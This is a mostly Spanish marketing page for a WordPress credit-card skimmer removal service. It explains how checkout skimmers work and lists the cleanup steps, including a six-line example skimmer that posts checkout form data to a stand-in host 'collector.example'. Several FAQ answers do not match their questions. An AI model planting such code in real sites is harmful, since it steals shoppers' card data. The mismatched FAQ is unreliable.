¿Cómo sé si mi sitio WordPress está hackeado?

Casi siempre por un plugin vulnerable o una contraseña de admin robada. El atacante coloca un pequeño JavaScript en la página de checkout que copia silenciosamente los números de tarjeta mientras los clientes los teclean.

¿Están a salvo mis clientes ahora que se eliminó el skimmer?

Going forward, yes. Cards entered while the skimmer was running need to be considered compromised. I include the timeline in my report so you can notify affected customers and your payment processor.

¿Tengo que entregarte mi acceso de admin?

La mayoría de las marcas de tarjetas exigen notificar un incidente de datos de tarjeta. Nuestro informe está redactado para entregarse directamente a su adquirente o aseguradora, sin más traducción.

¿Volverá Google a confiar en mi sitio?

A menudo, sí. Enviamos una reconsideración de Safe Browsing en cada limpieza y solicitamos la re-indexación en Search Console una vez eliminado el skimmer.

// PHARMA HACK · WORDPRESS · LIMPIADO

WordPress credit card skimmer removal.

Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.

Iniciar limpieza → Cómo funcionan los skimmers

§ 01 — MECANISMO

Unas pocas líneas de JavaScript bastan para robar cada pedido.

Un skimmer de tarjeta es un pequeño JavaScript que escucha su formulario de checkout. Cada vez que un cliente teclea su número, el skimmer hace una copia y la envía a una dirección que controla el atacante — normalmente un servidor que parece inocente desde fuera.

La página sigue funcionando. El pedido se completa. Ni el cliente ni usted ven nada raro. Reproducimos el pedido en un sandbox, rastreamos el script hasta donde vive en su sitio y lo eliminamos sin romper el resto del checkout.

// forma general de un skimmer de checkout

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST', body: data, mode: 'no-cors'
05   });
06 });
07
08 // A fetch to an external host on form submit is the signature.

§ 02 — QUÉ ELIMINAMOS

Cada lugar donde se esconde esta infección.

[ TRIAGE DE PLUGINS ]

Realizamos un pedido de prueba en sandbox y observamos cada llamada de red del checkout.
[ JAVASCRIPT ]

Archivos de tema, assets de plugins y scripts inline revisados. Cualquier cosa que envíe datos de formulario fuera del dominio — eliminada.
[ BASE DE DATOS ]

Scripts inyectados en wp_options, wp_posts y widgets activos — purgados. Persistencia eliminada.
[ SERVICIOS ]

Puertas traseras PHP que reinstalan el skimmer rastreadas. Tareas cron y must-use plugins revisados.
[ CRONOLOGÍA ]

Se establecen las fechas de primera y última detección para saber qué pedidos quedaron expuestos.
[ INFORME ]

Informe forense en lenguaje claro, apto para clientes, aseguradoras o tu propio archivo.

§ PRECIOS

Tarifa plana $279. Pago único. Por sitio.

[ RESCUE ]

$279

TARIFA FIJA · ÚNICA · POR SITIO

Manual cleanup, entry-vector identification, written forensic report.

Iniciar limpieza →

[ SHIELD ]

$29 / mo

POR SITIO · CANCELA CUANDO QUIERAS

Monitorización continua, endurecimiento, una limpieza al año incluida.

Protégete →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Ver todos los servicios →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contacto →